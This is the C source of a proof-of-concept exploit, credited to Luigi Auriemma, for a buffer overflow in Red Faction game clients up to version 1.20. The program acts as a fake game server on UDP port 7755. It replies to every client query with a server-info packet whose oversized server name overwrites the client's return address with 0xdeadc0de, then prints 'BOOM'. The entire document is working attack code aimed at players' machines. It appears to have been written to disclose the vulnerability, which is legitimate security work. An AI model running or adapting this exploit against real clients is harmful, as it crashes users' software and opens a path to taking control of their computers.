/*

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif




#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    7755
#define RETADDR "\xde\xc0\xad\xde"  // 0xdeadc0de




void std_err(void);




int main(int argc, char *argv[]) {
    int         sd,
                on = 1,
                psz;
    struct  sockaddr_in peer;
    u_char      *buff,
                info[] =
                "\x00\x01"                          // packet number
                "\x00\x00"                          // packet size - 4
                "\x89"                              // version (x89 = 1.20)
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"  // server name (260 bytes)
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                RETADDR "\0"
                "\x00"                              // type of game
                "\x01"                              // players
                "\x08"                              // max players
                "Relentless\0"                      // mapname
                "\x00"                              // dunno?
                "\x00";                             // password:
                                                    // 4 = yes, 0 = none

    setbuf(stdout, NULL);

    fputs("\n"
        "RedFaction <= 1.20 broadcast clients buffer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\nBinding UDP port %u\n", PORT);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd, (struct sockaddr *)&peer, psz)
      < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    *(u_short *)(info + 2) = sizeof(info) - 5;

    printf("Return address of clients will be overwritten with 0x%08lx\n", *(u_long *)RETADDR);

    fputs("\nClients:\n", stdout);
    while(1) {
        if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
          < 0) std_err();

        printf("%s:%hu -> ", inet_ntoa(peer.sin_addr), htons(peer.sin_port));

        if(sendto(sd, info, sizeof(info) - 1, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
        fputs("BOOM\n", stdout);
    }

    close(sd);
    return(0);
}





#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


